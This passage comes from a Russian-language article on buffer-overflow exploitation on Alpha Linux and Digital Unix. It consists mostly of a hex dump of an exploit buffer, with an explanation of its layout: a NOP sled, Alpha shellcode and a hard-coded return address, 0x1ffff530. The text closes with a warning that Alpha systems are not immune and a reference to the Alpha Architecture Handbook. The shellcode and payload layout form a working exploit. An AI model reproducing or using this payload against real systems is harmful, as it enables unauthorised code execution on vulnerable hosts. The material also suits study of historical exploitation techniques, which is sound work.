  496  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  512  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  528  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  544  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  560  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  576  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  592  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  608  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  624  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  640  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  656  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  672  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  688  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  704  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  720  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  736  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  752  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  768  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  784  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  800  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  816  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  832  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  848  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  864  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  880  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  896  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  912  04 ff 47 30 15 d9 43 11 74 f0 47 12 14 02 42 fc      ..G0..C.t.G...B.
  928  ff 32 b2 12 94 09 42 fc ff 32 b2 ff 47 3f 26 1f      .2....B..2..G?&.
  944  04 31 22 fc ff 30 b2 f7 ff 1f d2 10 04 ff 47 11      .1"..0........G.
  960  14 e3 43 20 35 20 42 ff ff ff ff 30 15 d9 43 31      ..C 5 B....0..C1
  976  15 d8 43 12 04 ff 47 40 ff 1e b6 48 ff fe b7 98      [email protected]....
  992  ff 7f 26 d0 8c 73 22 13 05 f3 47 3c ff 7e b2 69      ..&..s"...G<.~.i
 1008  6e 7f 26 2f 62 73 22 38 ff 7e b2 13 94 e7 43 20      n.&/bs"8.~....C 
 1024  35 60 42 ff ff ff ff 30 f5 ff 1f 01                  5`B....0....    

3 ~ 914
 инструкции nop.
915 ~ 1030
 шеллкод.
1031 ~ 1038
 адрес возврата. 0x000000001ffff530 ( "\x30\xf5\xff\x1f\x01\x00\x00\x00" )
Не беспокойтесь о последних '\0'.
----------------------------------------------------------------------------



9. Переполнение буфера в digital unix Код эксплойта из данной статьи так же работает в digital unix.



10. Итог Статья показывает технику переполнения буфера в alpha linux. Очень много администраторов не заботятся о переполнении буфера, т.к. они администрируют не intel x86, а alpha linux. Некоторые люди думают, что переполнение буфера не возможно на alpha linux. Как видите, это возможно.
НЕ ВЕРЬТЕ, ЧТО ПЕРЕПОЛНЕНИЕ БУФЕРА НЕ ВОЗМОЖНО НА ALPHA.



11. Ипользовалось
Alpha Architecture Handbook
http://ftp.digital.com/pub/Digital/info/semiconductor/literature/alphaahb.pdf
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
+-----[content]-----------------------------------------------------------------------------------------------------------------------------[mail us]-----+